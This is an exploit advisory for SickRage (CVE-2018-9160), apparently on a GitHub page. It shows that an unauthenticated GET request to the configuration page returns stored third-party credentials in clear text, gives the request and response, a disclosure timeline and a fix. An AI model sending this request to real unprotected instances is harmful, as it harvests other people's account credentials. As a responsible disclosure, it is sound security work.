Skip to content
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.

Sickrage cleartext github credentials CVE-2018-9160

  1. About

Exploit Title: SickRage Clear-Text Credentials in HTTP Response
Date: 2018-04-01
Exploit Author: Sven Fassbender
Vendor Homepage:
Software Link:
Version: < v2018.03.09-1
CVE : CVE-2018-9160
Category: webapps

  1. Background information

"SickRage is an automatic Video Library Manager for TV Shows.
It watches for new episodes of your favourite shows, and when they are posted it does its magic:
automatic torrent/nzb searching, downloading, and processing at the qualities you want." --extract from

  1. Vulnerability description

SickRage returns clear-text credentials for e.g. GitHub, AniDB, Kodi, Plex etc. in HTTP responses.
Prerequisite is that the user did not set a username and password for their SickRage installation. (not enforced, default)

HTTP request:

GET /config/general/ HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  

HTTP response:

HTTP/1.1 200 OK  
Content-Length: 113397  
Vary: Accept-Encoding  
Server: TornadoServer/4.5.1  
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"  
Date: Fri, 02 Mar 2018 10:47:51 GMT  
Content-Type: text/html; charset=UTF-8  

<!DOCTYPE html>  
<html lang="nl_NL">  
        <input type="text" name="git_username" id="git_username" value="" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />  
        <input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />  

  1. Proof of Concept

  1. Timeline

[2018-03-07] Vulnerability discovered
[2018-03-08] Vendor contacted
[2018-03-08] Vendor replied
[2018-03-09] Vulnerability fixed. (

  1. Recommendation

Update the SickRage installation on v2018.03.09-1 or later.
Protect the access to the web application with proper user credentials.

You can’t perform that action at this time.